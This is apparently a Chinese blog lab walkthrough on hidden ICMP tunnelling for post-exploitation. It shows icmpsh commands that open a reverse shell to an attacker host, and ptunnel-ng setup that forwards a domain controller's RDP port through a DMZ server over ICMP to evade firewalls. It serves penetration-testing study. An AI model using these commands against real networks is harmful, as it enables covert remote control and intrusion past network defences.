内网-隐藏隧道通信技术,场景复现(ICMP隧道)

隐藏隧道通信技术(ICMP隧道)

一 icmpsh(跨平台)
环境:
外网攻击测试机,内网主机
下载工具:
git clonehttps://github.com/inquisb/icmpsh.git
安装依赖包:
apt-get install python-impacket
修改icmp通信方法:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
外网攻击测试机:
./icmpsh_m.py ip(攻击) ip(目标) //等待反弹shell
内网主机:
icmpsh.exe -t i p(攻击) -d 500 -b 30 -s 128

二 pingtunnel(跨平台,可设置密码)
2.1 实验环境
软件防火墙:
VM配置:双网卡:桥接+仅主机
monowall 10.1.1.1/192.168.1.10
公网vps:
VM配置:桥接
kali2020 192.168.1.13
攻击者PC:
VM配置:桥接
windows7 192.168.1.2
DMZ区服务器:
VM配置:双网卡 仅主机+桥接
kali2020 192.168.1.4/10.1.1.5
内网PC:
VM配置:仅主机
windows2012 10.1.1.2(DC)
2.2 简单拓扑
内网-隐藏隧道通信技术,场景复现(ICMP隧道)_第1张图片

2.3 功能实现
通过ICMP协议,使攻击者能直接控制内网PC
2.4 过程复现
A vps和dmz区服务器安装pingtunnel工具
1.下载https://github.com/lnslbrty/ptunnel-ng
2.安装编译
tar xf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install
可能遇到的错误
缺少pcap.h
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
yacc包错误
Sudo apt-get install –y byacc
./configure
make
sudo make install
B 在dmz区服务器开启监听
ptunnel -x shuteer //-x shuteer 设置密码为shuteer

内网-隐藏隧道通信技术,场景复现(ICMP隧道)_第2张图片
C 在vps开启监听
ptunnel -p 192.168.1.4 -lp 1080 -da 10.1.1.2 -dp 3389 -x shuteer //在vps本地的1080端口监听dmz区服务器icmp的流量,并转发到内网主机的3389端口
内网-隐藏隧道通信技术,场景复现(ICMP隧道)_第3张图片

参数说明:
-x 指定 icmp 隧道连接验证密码
-lp 指定要监听的本地 tcp 端口
-da 指定要转发到的机器的 ip 地址
-dp 指定要转发到的机器的 tcp 端口
-p 指定icmp隧道另一端机器的 ip 地址
D 在攻击者PC
连接vps服务器的1080端口,并登录:
内网-隐藏隧道通信技术,场景复现(ICMP隧道)_第4张图片

你可能感兴趣的:(安全)